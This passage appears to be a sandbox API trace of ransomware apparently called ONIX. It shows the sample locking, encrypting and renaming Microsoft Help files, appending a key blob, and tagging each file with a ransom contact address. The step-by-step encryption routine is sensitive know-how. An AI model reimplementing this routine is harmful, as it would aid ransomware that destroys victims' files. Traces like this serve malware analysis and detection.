lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.280] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x158, lpOverlapped=0x0) returned 1 [0122.280] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.280] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x158, lpOverlapped=0x0) returned 1 [0122.281] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x158, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.281] CloseHandle (hObject=0x4d0) returned 1 [0122.282] GetProcessHeap () returned 0x410000 [0122.282] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.282] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.284] GetProcessHeap () returned 0x410000 [0122.284] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.284] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.DEV.14.1033.hxn", cAlternateFileName="MSPOWE~2.HXN")) returned 1 [0122.284] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.284] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.285] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x170, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.285] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.285] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.285] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.285] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.285] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.285] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 62 [0122.285] GetProcessHeap () returned 0x410000 [0122.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x44faf8 [0122.285] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" [0122.285] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.285] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=368) returned 1 [0122.285] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x170 [0122.285] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.285] GetProcessHeap () returned 0x410000 [0122.285] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.285] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.286] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.289] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.290] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x170) returned 0x442938 [0122.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x170) returned 0x46a0f0 [0122.291] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.291] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x170, lpOverlapped=0x0) returned 1 [0122.291] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.291] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x170, lpOverlapped=0x0) returned 1 [0122.292] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x170, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.292] CloseHandle (hObject=0x4d0) returned 1 [0122.293] GetProcessHeap () returned 0x410000 [0122.293] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.293] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.295] GetProcessHeap () returned 0x410000 [0122.295] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.295] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.SETLANG.14.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1 [0122.295] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.295] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.296] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x152, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.296] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.296] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.296] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.296] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.296] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.296] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 57 [0122.296] GetProcessHeap () returned 0x410000 [0122.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0122.296] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" [0122.296] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.296] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=338) returned 1 [0122.296] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x152 [0122.296] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.296] GetProcessHeap () returned 0x410000 [0122.296] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.296] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.296] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.300] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.303] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.303] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x44faf8 [0122.304] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x442938 [0122.304] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.304] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.304] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.304] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.305] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x152, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.305] CloseHandle (hObject=0x4d0) returned 1 [0122.306] GetProcessHeap () returned 0x410000 [0122.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.306] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.308] GetProcessHeap () returned 0x410000 [0122.308] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.308] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5269fec0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.14.1033.hxn", cAlternateFileName="MSVISI~1.HXN")) returned 1 [0122.308] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.309] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.309] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x146, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.309] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.309] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.309] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.309] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.309] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.309] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 55 [0122.309] GetProcessHeap () returned 0x410000 [0122.309] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0122.309] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" [0122.310] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.310] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=326) returned 1 [0122.310] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x146 [0122.310] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.310] GetProcessHeap () returned 0x410000 [0122.310] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.310] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.310] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.313] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.314] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.315] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x442938 [0122.315] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x46a0f0 [0122.315] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.315] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.316] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.316] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.317] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x146, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.317] CloseHandle (hObject=0x4d0) returned 1 [0122.317] GetProcessHeap () returned 0x410000 [0122.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.317] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.320] GetProcessHeap () returned 0x410000 [0122.320] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.320] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.DEV.14.1033.hxn", cAlternateFileName="MSVISI~3.HXN")) returned 1 [0122.320] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.320] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.320] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15e, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.320] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.320] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.321] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.321] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.321] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.321] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 59 [0122.321] GetProcessHeap () returned 0x410000 [0122.321] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0122.321] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" [0122.321] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.321] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=350) returned 1 [0122.321] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15e [0122.321] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.321] GetProcessHeap () returned 0x410000 [0122.321] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.321] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.321] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.324] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.325] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 